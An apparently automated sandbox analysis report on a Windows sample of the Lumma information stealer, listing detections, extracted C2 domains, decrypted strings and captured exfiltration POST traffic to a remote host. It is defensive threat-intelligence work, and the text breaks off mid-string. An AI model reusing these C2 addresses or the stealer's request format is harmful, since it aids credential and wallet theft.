
Windows Analysis Report
WonderHack.exe

Overview

General Information

Sample name: WonderHack.exe
Analysis ID: 1579560
MD5: 65fc002ab58b0dc2e95e19b1f308a354
SHA1: 68ccb931b324d2988f0bad099dac28ae10dd7588
SHA256: 42c47b4221417b2f52c1e783e06d01401b8064a715eb88c54c8d00db8016a2ec
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • WonderHack.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\WonderHack.exe" MD5: 65FC002AB58B0DC2E95E19B1F308A354)
    • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WonderHack.exe (PID: 3696 cmdline: "C:\Users\user\Desktop\WonderHack.exe" MD5: 65FC002AB58B0DC2E95E19B1F308A354)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["smash-boiling.cyou", "supporse-comment.cyou", "ripe-blade.cyou", "bellflamre.click", "greywe-snotty.cyou", "steppriflej.xyz", "pollution-raker.cyou", "sendypaster.xyz", "hosue-billowy.cyou"], "Build id": "LPnhqo--ybzklzpanlwp"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000002.00000003.2527201915.0000000000F51000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: WonderHack.exe PID: 3696 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: WonderHack.exe PID: 3696 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.WonderHack.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
2.2.WonderHack.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T00:48:34.217069+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 193.143.1.9 | 443 | TCP
2024-12-23T00:49:06.217277+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 193.143.1.9 | 443 | TCP
2024-12-23T00:49:09.290585+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49760 | 23.55.153.106 | 443 | TCP
2024-12-23T00:49:11.733313+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:13.815665+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:16.153911+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49777 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:18.401160+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49784 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:20.953353+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49793 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:23.663286+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49800 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:26.284170+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49806 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:30.201674+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49817 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:12.482826+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:14.582391+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:12.482826+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:14.582391+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 104.21.66.86 | 443 | TCP
2024-12-23T00:48:02.275654+0100 | 2058212 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 54073 | 1.1.1.1 | 53 | UDP
2024-12-23T00:49:17.087529+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49777 | 104.21.66.86 | 443 | TCP
2024-12-23T00:49:10.056462+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49760 | 23.55.153.106 | 443 | TCP


AV Detection

Source: 00000000.00000002.1704771432.0000000002F51000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["smash-boiling.cyou", "supporse-comment.cyou", "ripe-blade.cyou", "bellflamre.click", "greywe-snotty.cyou", "steppriflej.xyz", "pollution-raker.cyou", "sendypaster.xyz", "hosue-billowy.cyou"], "Build id": "LPnhqo--ybzklzpanlwp"}
Source: WonderHack.exe | Virustotal: Detection: 38%
Source: WonderHack.exe | ReversingLabs: Detection: 28%
Source: WonderHack.exe | Joe Sandbox ML: detected
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: pollution-raker.cyou
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: hosue-billowy.cyou
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: ripe-blade.cyou
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: smash-boiling.cyou
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: supporse-comment.cyou
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: greywe-snotty.cyou
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: steppriflej.xyz
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: sendypaster.xyz
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: bellflamre.click
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000002.00000002.2584594143.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: LPnhqo--ybzklzpanlwp
Source: WonderHack.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: WonderHack.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\WonderHack.exe | Code function: 0_2_00CB9126 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00CB9126

Networking

Source: Network traffic | Suricata IDS: 2058212 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bellflamre .click) : 192.168.2.4:54073 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49765 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49765 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49760 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49771 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49771 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49777 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: smash-boiling.cyou
Source: Malware configuration extractor | URLs: supporse-comment.cyou
Source: Malware configuration extractor | URLs: ripe-blade.cyou
Source: Malware configuration extractor | URLs: bellflamre.click
Source: Malware configuration extractor | URLs: greywe-snotty.cyou
Source: Malware configuration extractor | URLs: steppriflej.xyz
Source: Malware configuration extractor | URLs: pollution-raker.cyou
Source: Malware configuration extractor | URLs: sendypaster.xyz
Source: Malware configuration extractor | URLs: hosue-billowy.cyou
Source: DNS query: sendypaster.xyz
Source: DNS query: steppriflej.xyz
Source: Joe Sandbox View | IP Address: 104.21.66.86
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | ASN Name: BITWEB-ASRU
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 193.143.1.9:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 193.143.1.9:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49760 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49784 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49817 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49800 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 104.21.66.86:443
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 54
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=38YTQXSPNP1CBN
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18146
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=AF7HU3P5H1T
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8749
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=D4D6LD3A1MO86BTXG0I
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20450
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SBUV6UEUOZ0XP5Q
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1225
    Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=WQKZ4A7CKB5
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 587715
    Host: lev-tolstoi.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: .fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https: equals www.youtube.com (Youtube)
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: d.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: d.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=32d8a0bc1b3577f29e8cdb62; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 22 Dec 2024 23:49:09 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: bellflamre.click
Source: global traffic | DNS traffic detected: DNS query: sendypaster.xyz
Source: global traffic | DNS traffic detected: DNS query: steppriflej.xyz
Source: global traffic | DNS traffic detected: DNS query: greywe-snotty.cyou
Source: global traffic | DNS traffic detected: DNS query: supporse-comment.cyou
Source: global traffic | DNS traffic detected: DNS query: smash-boiling.cyou
Source: global traffic | DNS traffic detected: DNS query: ripe-blade.cyou
Source: global traffic | DNS traffic detected: DNS query: hosue-billowy.cyou
Source: global traffic | DNS traffic detected: DNS query: pollution-raker.cyou
Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic | DNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430172119.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2430172119.0000000000F61000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: WonderHack.exe, 00000002.00000002.2585120871.0000000000EAC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered_
Source: WonderHack.exe, 00000002.00000003.2407264912.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: WonderHack.exe, 00000002.00000003.2478133377.0000000003325000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
Source: WonderHack.exe, 00000002.00000003.2407221661.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407281203.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: WonderHack.exe, 00000002.00000003.2479583191.00000000032E9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: WonderHack.exe, 00000002.00000003.2430953439.000000000332B000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431176780.0000000003329000.00000004.00000800.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2431020872.0000000003329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
Source: WonderHack.exe, 00000002.00000003.2430204975.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, WonderHack.exe, 00000002.00000003.2407396885.0000000000F08000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.stP
